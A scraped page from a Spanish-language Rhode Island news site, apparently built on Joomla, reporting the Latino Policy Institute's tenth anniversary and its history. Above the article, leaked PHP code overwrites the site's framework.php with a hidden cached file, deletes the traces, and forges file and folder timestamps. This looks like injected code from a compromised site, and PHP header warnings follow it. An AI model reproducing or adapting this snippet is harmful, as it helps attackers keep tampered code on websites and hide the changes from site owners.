$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Latino Policy Institute celebra 10 años de su fundación

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: Locales > Noticias > Latino Policy Institute celebra 10 años de su fundación

Latino Policy Institute celebra 10 años de su fundación

Imprimir PDF

alt

 PROVIDENCE, RI. – Hace diez años un grupo de jóvenes profesionales hispanos se reunió con la idea de crear un organismo que se encargara de documentar con datos reales -y no con números basados en suposiciones- la participación de los latinos en áreas fundamentales para el desenvolvimiento del estado de Rhode Island. Fue así como surgió lo que hoy se conoce como Latino Policy Institute (LPI), una entidad comprometida en generar y dar a conocer datos estadísticos sobre los latinos en Rhode Island, cuya misión es estimular el discurso de políticas públicas y mejorar la comprensión del público acerca de la presencia latina en el estado.

“El Latino Police Institute comenzó alrededor de la mesa de cocina de Nick Figueroa”, recuerda Anna Cano Morales, actual directora ejecutiva de la institución. En esa reunión estaban los profesores e investigadores Jorge Elorza, Domingo Morel, entre otros, quienes, cansados de presenciar que las conversaciones sobre latinos giraban siempre en torno presunciones, estereotipos, e ignorancia, algunas veces, decidieron que había llegado el momento de hacer algo al respecto.

El Instituto quedó formalmente constituido gracias a fondos aportados por la Rhode Island Foundation, a través de su programa de Filantropía, en la que laboraba Cano Morales para entonces. En 2007 llegaron a un acuerdo con la Roger Williams University, y se creó el Latino Policy Institute at Roger Williams University.

Al principio, los directivos de la organización participaban en calidad de voluntarios, hasta que las necesidades de institución y la magnitud del trabajo que se estaba realizando, determinó la necesidad de crear una estructura más formal.

Con la designación de Cano Morales en la dirección ejecutiva, se creó también una estructura organizacional de la que hoy forma parte un equipo de profesionales que trabaja arduamente en la elaboración de estudios que luego son condesados en gráficos educativos.

Según explica su directora ejecutiva, las investigaciones del LPI han servido de base para mejorar el entendimiento de entidades y líderes de Rhode Island sobre la participación de los latinos en renglones como educación, desarrollo económico, inmigración, y salud. También han servido para derribar mitos e incentivar políticas de estado.

Entre sus reportes con mayor repercusión está el de la participación de los latinos en la educación, que fue divulgado en 2013, y ha sido uno de los más utilizados hasta ahora a nivel estatal.